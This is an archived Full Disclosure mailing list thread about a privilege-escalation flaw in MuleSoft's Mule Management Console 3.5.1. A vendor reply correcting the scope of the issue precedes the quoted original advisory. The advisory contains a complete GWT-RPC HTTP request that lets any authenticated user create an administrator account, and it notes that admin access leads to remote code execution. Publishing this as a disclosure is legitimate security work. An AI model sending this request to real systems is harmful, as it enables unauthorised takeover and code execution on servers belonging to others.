[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [FD] Mulesoft ESB Authenticated Privilege Escalation
From:       Barak Engel <barak () mulesoft ! com>
Date:       2014-10-24 0:36:09
Message-ID: 54499EF9.4090308 () mulesoft ! com
[Download RAW message or body]

Thank you Brandon Perry for finding this vulnerability.

We would like to make a correction to the disclosure - this issue 
affects only the Mule Enterprise Management Console (MMC) used by some 
customer administrators to manage Mule ESB runtimes, and not the Mule 
ESB runtime itself. MMC is typically deployed in a secure network 
segment, accessible only to trusted users. Therefore, under normal 
conditions, this exploit would originate from an internal trusted user.

MuleSoft has identified the source code in the MMC product that produces 
this vulnerability, and is developing a patch to fix the issue.

For further information please visit: 
http://www.mulesoft.org/documentation/display/current/Mule+Enterprise+Management+Console+Security+Update


==ORIGINAL TEXT FOLLOWS==

Mulesoft ESB Authenticated Privilege Escalation From: Brandon Perry 
<bperry.volatile () gmail com>
Date: Tue, 21 Oct 2014 12:06:55 -0500

Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code
Execution



  Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.


  POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1

Host: 192.168.0.22:8585

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: text/x-gwt-rpc; charset=utf-8/

Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp

Content-Length: 503

Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4;

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

  7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/
> 5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611|
> 
fdsafdsa () fdsafdsa com
> java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-43 \
> 6eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15|
> 


  This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic